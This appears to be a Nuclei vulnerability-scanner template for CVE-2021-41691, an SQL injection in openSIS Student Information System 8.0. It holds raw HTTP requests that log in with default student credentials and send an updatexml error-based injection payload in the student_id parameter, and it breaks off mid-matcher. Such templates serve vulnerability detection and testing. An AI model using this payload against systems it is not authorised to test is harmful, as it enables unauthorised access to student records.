id: CVE-2021-41691 info: name: openSIS Student Information System 8.0 SQL Injection author: Bartu Utku SARP severity: high description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. reference: - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://www.exploit-db.com/exploits/50637 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 tags: sqli,auth,edb,cve,cve2021,opensis metadata: max-request: 2 variables: num: "999999999" http: - raw: - | POST /index.php HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&language=en&log= - | POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 attack: pitchfork payloads: username: - student password: - student@123 req-condition: true cookie-reuse: true matchers: - type: dsl dsl: - 'contains(body_2, "